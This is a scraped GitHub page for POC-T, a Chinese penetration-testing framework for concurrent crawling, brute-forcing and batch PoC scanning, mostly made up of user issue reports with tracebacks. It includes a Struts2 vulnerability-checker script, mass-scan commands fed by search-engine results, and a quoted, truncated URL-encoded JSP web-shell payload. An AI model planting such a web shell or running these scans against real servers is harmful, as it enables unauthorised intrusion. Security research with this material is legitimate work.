脚本调用框架,用于渗透测试中 采集|爬虫|爆破|批量PoC 等需要并发的任务。
欢迎提交PoC及实用脚本(提PR或邮件联系[email protected]),您贡献的PoC相关信息将会在以下位置公开。
- 支持多线程/Gevent两种并发模式
- 极简式脚本编写,无需参考文档
- 内置脚本扩展及常用PoC函数
- 支持第三方搜索引擎API(已完成ZoomEye/Shodan/Google/Fofa免费版)
- Python 2.7
- pip
- mail:[email protected]
渗透测试插件化并发框架 / Open-sourced remote vulnerability PoC/EXP framework
脚本调用框架,用于渗透测试中 采集|爬虫|爆破|批量PoC 等需要并发的任务。
欢迎提交PoC及实用脚本(提PR或邮件联系[email protected]),您贡献的PoC相关信息将会在以下位置公开。
01 需求与设计
爬虫
示例:B站用户签名档爬虫
命令:python POC-T.py -eC -s spider-example -iA 1-200000 -t 50
-eC : 使用单线程异步(协程)
-iA 1-200000 : 生成从1到200000的连续数字作为用户ID
-t 50 : 设置并发数量为50
源码里 没有-eC参数 异步协程-eG
建议-f选项支持IP格式,不用加“http://”和最后的“/”,因为zoomeye等引擎的API的host导出都是IP格式。感谢分享。
shodan接口搜索的时候不稳定,limit的值大于200的时候会提示[!] Automatic authorization failed.
Input API-KEY >
[-] Invalid Shodan API key.
输入API后没反应
另外还可以加上https://www.censys.io/这个API,结果可能更全
还有能否支持https的爬取?
RT
想咨询下POC-T是否支持bugscan或者beebeeto的脚本啊?
fofa API配好后命令行下还是提示输入输入email和API,另外zoomeye接口今天更新了,兼容老版本的API。
只需要借用一下SHODAN的参数就好了。
/lib/api/zoomeye/pack.py
def ZoomEyeSearch(query, limit, type='host', offset=0):
...
limit += offset
for page_n in range(int(offset / 10), (limit + 10 - 1) / 10):
...
/lib/controler/api.py
if conf.API_MODE is API_MODE_NAME.ZOOMEYE:
anslist = ZoomEyeSearch(query=dork, limit=limit, type=conf.ZOOMEYE_SEARCH_TYPE, offset=conf.SHODAN_OFFSET)
...
/lib/core/option.py
if conf.API_MODE is API_MODE_NAME.ZOOMEYE:
if search_type not in ['web', 'host']:
msg = 'Invalid value in [--search-type], show usage with [-h]'
sys.exit(logger.error(msg))
else:
conf.ZOOMEYE_SEARCH_TYPE = search_type
conf.SHODAN_OFFSET = offset
...
cron version is 3.0pl1-128ubuntu2
seems like cron refuse to execute malformed crontab file (no matter where it is placed)
Zoomeye无法验证 输入账号密码总是显示失败
好久不更新了?
root@kali:/home/fuck/POC-T# python POC-T.py
Traceback (most recent call last):
File "POC-T.py", line 7, in
from lib.cli import main
File "/home/fuck/POC-T/lib/cli.py", line 10, in
from lib.controller.loader import loadModule, loadPayloads
File "/home/fuck/POC-T/lib/controller/loader.py", line 14, in
from lib.controller.api import runApi
File "/home/fuck/POC-T/lib/controller/api.py", line 11, in
from lib.api.shodan.pack import ShodanSearch
File "/home/fuck/POC-T/lib/api/shodan/pack.py", line 9, in
from shodan.exception import APIError
ImportError: No module named exception
root@kali:/home/fuck/POC-T#
[*] Activate Google API
Traceback (most recent call last):
File "/home/tools/expliot/POC-T-2.0/lib/cli.py", line 45, in main
loadPayloads()
File "/home/tools/expliot/POC-T-2.0/lib/controller/loader.py", line 49, in loadPayloads
api_mode()
File "/home/tools/expliot/POC-T-2.0/lib/controller/loader.py", line 88, in api_mode
file = runApi()
File "/home/tools/expliot/POC-T-2.0/lib/controller/api.py", line 27, in runApi
anslist = GoogleSearch(query=dork, limit=limit, offset=conf.API_OFFSET)
File "/home/tools/expliot/POC-T-2.0/lib/api/google/pack.py", line 60, in GoogleSearch
service = build("customsearch", "v1", http=_initHttpClient(), developerKey=key)
File "/usr/local/lib/python2.7/dist-packages/googleapiclient/_helpers.py", line 134, in positional_wrapper
return wrapped(*args, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/googleapiclient/discovery.py", line 225, in build
requested_url, discovery_http, cache_discovery, cache, developerKey
File "/usr/local/lib/python2.7/dist-packages/googleapiclient/discovery.py", line 282, in _retrieve_discovery_doc
resp, content = http.request(actual_url)
File "/home/tools/expliot/POC-T-2.0/thirdparty/httplib2/init.py", line 1609, in request
(response, content) = self._request(conn, authority, uri, request_uri, method, body, headers, redirections, cachekey)
File "/home/tools/expliot/POC-T-2.0/thirdparty/httplib2/init.py", line 1351, in _request
(response, content) = self._conn_request(conn, request_uri, method, body, headers)
File "/home/tools/expliot/POC-T-2.0/thirdparty/httplib2/init.py", line 1272, in _conn_request
conn.connect()
File "/home/tools/expliot/POC-T-2.0/thirdparty/httplib2/init.py", line 1059, in connect
raise SSLHandshakeError(e)
SSLHandshakeError: [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:727)
[!] It seems like you reached a unhandled exception, please report it to author's mail:[email protected] or raise a issue via:https://github.com/Xyntax/POC-T/issues/new.
有些扫描会出异常,建议将这部分结果加到统计中,便于排查。
像这样:
0 found | 0 remaining | 5 scanned | 5 failed in 2.61 seconds
测试环境 centos6.5 ,python 2.6.6, 执行
-T -m test --api --dork "jboss country:vn" --max-page 10
提示:ValueError: zero length field name in format
RT
zoomeye改版了,貌似无法获取数据。
confluence-traversal目录遍历需要登录的,脚本中未提供cookie等信息。
Traceback (most recent call last):
File "POC-T.py", line 7, in
from lib.cli import main
File "/home/fuck/POC-T/lib/cli.py", line 10, in
from lib.controller.loader import loadModule, loadPayloads
File "/home/fuck/POC-T/lib/controller/loader.py", line 14, in
from lib.controller.api import runApi
File "/home/fuck/POC-T/lib/controller/api.py", line 11, in
from lib.api.shodan.pack import ShodanSearch
File "/home/fuck/POC-T/lib/api/shodan/pack.py", line 9, in
from shodan.exception import APIError
ImportError: No module named exception
您好,我是在校信息安全专业大学生。是您POC-T的忠实用户,这个脚本调用框架给我学习上带来了很大的帮助。最近我在使用zoomeye api的时候发现了一些问题,由于我python水平不高无法自己解决。您能给我一点建议吗?
问题如下:
命令为
python2 POC-T.py -eT -t 50 -s struts2-s2045 -aZ "login.action" --limit 3000
Traceback (most recent call last):
File "C:\Users\Administrator\Desktop\网络工具\POC-T-2.0\lib\cli.py", line 45, in main
loadPayloads()
File "C:\Users\Administrator\Desktop\网络工具\POC-T-2.0\lib\controller\loader.py", line 49, in loadPayloads
api_mode()
File "C:\Users\Administrator\Desktop\网络工具\POC-T-2.0\lib\controller\loader.py", line 88, in api_mode
file = runApi()
File "C:\Users\Administrator\Desktop\网络工具\POC-T-2.0\lib\controller\api.py", line 23, in runApi
anslist = ZoomEyeSearch(query=dork, limit=limit, type=conf.ZOOMEYE_SEARCH_TYPE, offset=conf.API_OFFSET)
File "C:\Users\Administrator\Desktop\网络工具\POC-T-2.0\lib\api\zoomeye\pack.py", line 29, in ZoomEyeSearch
data = z.dork_search(query, resource=type, page=page_n)
File "C:\Users\Administrator\Desktop\网络工具\POC-T-2.0\lib\api\zoomeye\base.py", line 83, in dork_search
resp = requests.get(zoomeye_api, params=params, headers=headers)
File "G:\python2\lib\site-packages\requests\api.py", line 75, in get
return request('get', url, params=params, **kwargs)
File "G:\python2\lib\site-packages\requests\api.py", line 60, in request
return session.request(method=method, url=url, **kwargs)
File "G:\python2\lib\site-packages\requests\sessions.py", line 533, in request
resp = self.send(prep, **send_kwargs)
File "G:\python2\lib\site-packages\requests\sessions.py", line 646, in send
r = adapter.send(request, **kwargs)
File "G:\python2\lib\site-packages\requests\adapters.py", line 498, in send
raise ConnectionError(err, request=request)
ConnectionError: ('Connection aborted.', error(10060, ''))
[!] It seems like you reached a unhandled exception, please report it to author's mail:[email protected] or raise a issue via:https://github.com/Xyntax/POC-T/issues/new;
发现您很久没更新POC-T了,能稍微更新下吗?
我已经通过邮箱联系您并发送了详细信息,还有我要贡献的最新poc
什么时候能发布个py 3.X的版本
#!/usr/bin/env python
#coding:utf-8
#struts2漏洞一次性检测工具
#现只供检测漏洞
from script.s2045 import s2_045
from script.s2devmode import s2_devmode
from script.s2032 import s2_032
from script.s2016 import s2_016
import sys
def begin(url):
if '://' not in url:
url = 'http://' + url
#检测s2-016漏洞
if s2_016(url):
print "[]存在s2_016漏洞" + url
if s2_032(url):
print "[]存在s2_032漏洞" + url
if s2_devmode(url):
print "[]存在s2_devmode漏洞" + url
if s2_045(url):
print "[]存在s2_045漏洞" + url
def poc():
begin(url)
hello,https://github.com/Xyntax/POC-T/wiki/03-编写脚本 wiki中这样写到可以支持全路径
经过测试是不支持的,脚本路径写死了,建议更改。
https://api.zoomeye.org/resources-info
接口原本返回的 host-search
和web-search
已合并成 search
现有的代码获取方式有点问题 会导致异常退出
Traceback (most recent call last):
File "/home/qiyuan/POC-T/lib/cli.py", line 45, in main
loadPayloads()
File "/home/qiyuan/POC-T/lib/controller/loader.py", line 49, in loadPayloads
api_mode()
File "/home/qiyuan/POC-T/lib/controller/loader.py", line 88, in api_mode
file = runApi()
File "/home/qiyuan/POC-T/lib/controller/api.py", line 23, in runApi
anslist = ZoomEyeSearch(query=dork, limit=limit, type=conf.ZOOMEYE_SEARCH_TYPE, offset=conf.API_OFFSET)
File "/home/qiyuan/POC-T/lib/api/zoomeye/pack.py", line 25, in ZoomEyeSearch
z = _initial()
File "/home/qiyuan/POC-T/lib/api/zoomeye/pack.py", line 16, in _initial
msg = 'Available ZoomEye search: (web:%s,host:%s)' % (info['web-search'], info['host-search'])
KeyError: 'web-search'
path-POC-T/lib/api/zoomeye 下的 pack.py
文件 line 16 替换成如下
msg = 'Available ZoomEye search: (search:%s)' % (info.get('web-search', ''))
此框架非常棒,在增加一些参数选项后框架会更完美。例如增加一个打开字典文件的参数,在poc中可以直接调用,那么此框架对与cms识别,网站目录扫描等方面,编写poc 脚本会更灵活方便。可以考虑一下。。。。。
请问下如何生成的shellcode??
jsp = ("%3c%25%40%20%70%61%67%65%20%69%6d%70%6f%72%74%3d%22%6a%61%76%61%2e%75" "%74%69%6c%2e%2a%2c%6a%61%76%61%2e%69%6f%2e%2a%2c%20%6a%61%76%61%2e%6e" "%65%74%2e%2a%22%20%70%61%67%65%45%6e%63%6f%64%69%6e%67%3d%22%55%54%46" "%2d%38%22%25%3e%3c%70%72%65%3e%3c%25%69%66%20%28%72%65%71%75%65%73%74" "%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%70%70%70%22%29%20%21%3d" "%20%6e%75%6c%6c%29%20%7b%20%53%74%72%69%6e%67%20%77%72%69%74%65%70%65" "%72%6d%69%73%73%69%6f%6e%20%3d%20%28%6e%65%77%20%44%61%74%65%28%29%2e" "%74%6f%53%74%72%69%6e%67%28%29%2e%73%70%6c%69%74%28%22%3a%22%29%5b%30" "%5d%2b%22%68%2e%6c%6f%67%22%29%2e%72%65%70%6c%61%63%65%41%6c%6c%28%22" "%20%22%2c%20%22%2d%22%29%3b%20%53%74%72%69%6e%67%20%73%68%5b%5d%20%3d" "%20%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22" "%70%70%70%22%29%2e%73%70%6c%69%74%28%22%20%22%29%3b%20%63%68%65%63%6b" "%2e%73%65%74%52%65%71%75%65%73%74%50%72%6f%70%65%72%74%79%28%22%55%73" "%65%72%2d%41%67%65%6e%74%22%2c%20%72%65%71%75%65%73%74%2e%67%65%74%48" "%65%61%64%65%72%28%22%48%6f%73%74%22%29%2b%22%3c%2d%22%2b%72%65%71%75" "%65%73%74%2e%67%65%74%52%65%6d%6f%74%65%41%64%64%72%28%29%29%3b%20%69" "%66%20%28%21%6e%65%77%20%46%69%6c%65%28%22%63%68%65%63%6b%5f%22%2b%77" "%72%69%74%65%70%65%72%6d%69%73%73%69%6f%6e%29%2e%65%78%69%73%74%73%28" "%29%29%7b%20%50%72%69%6e%74%57%72%69%74%65%72%20%77%72%69%74%65%72%20" "%3d%20%6e%65%77%20%50%72%69%6e%74%57%72%69%74%65%72%28%22%63%68%65%63" "%6b%5f%22%2b%77%72%69%74%65%70%65%72%6d%69%73%73%69%6f%6e%29%3b%20%63" "%68%65%63%6b%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%3b%20" "%77%72%69%74%65%72%2e%63%6c%6f%73%65%28%29%3b%20%7d%20%65%6c%73%65%20" "%69%66%20%28%73%68%5b%30%5d%2e%63%6f%6e%74%61%69%6e%73%28%22%69%64%22" "%29%20%7c%7c%20%73%68%5b%30%5d%2e%63%6f%6e%74%61%69%6e%73%28%22%69%70" "%63%6f%6e%66%69%67%22%29%29%20%63%68%65%63%6b%2e%67%65%74%49%6e%70%75"
修改后项目没有报错,但是无法解析输入内容,总是抛异常File "F:\Tools_ST\005POC_Frame\POC-T\thirdparty\ansistrm\ansistrm.py", line 69, in emit
self.handleError(record
Traceback (most recent call last):
File "POC-T.py", line 7, in
from lib.cli import main
File "/opt/POC-T/POC-T/lib/cli.py", line 10, in
from lib.controller.loader import loadModule, loadPayloads
File "/opt/POC-T/POC-T/lib/controller/loader.py", line 14, in
from lib.controller.api import runApi
File "/opt/POC-T/POC-T/lib/controller/api.py", line 13, in
from lib.api.google.pack import GoogleSearch
File "/opt/POC-T/POC-T/lib/api/google/pack.py", line 7, in
from googleapiclient.discovery import build
ImportError: No module named googleapiclient.discovery
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.